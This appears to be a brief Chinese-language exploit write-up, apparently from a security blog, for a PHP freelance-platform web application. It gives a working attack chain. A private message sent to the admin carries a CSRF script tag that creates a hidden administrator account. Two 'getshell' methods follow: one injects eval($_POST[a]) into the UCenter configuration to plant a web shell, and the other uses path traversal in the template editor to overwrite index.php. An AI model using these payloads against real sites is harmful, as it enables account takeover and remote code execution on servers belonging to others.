1.注册会员
2. http://127.0.0.1/index.php?do=user&view=message&msg_type=write
3,发送给admin,下面是csrf,目的是加一个管理员,账户kppw 密码kppwkppw
<script src=http://127.0.0.1/control/admin/index.php?do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword %5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw.com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>
4,getshell方法有两个
(1)gpc off 全局配置 会员整合 UCENTER 编码 修改为’);eval($_POST[a])?>;
连接http://127.0.0.1/config/config_ucenter.php
(2) http://127.0.0.1/control/admin/index.php?do=tpl&view=edit_tpl&tplname=default&tname=../../index.php
作者:take
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论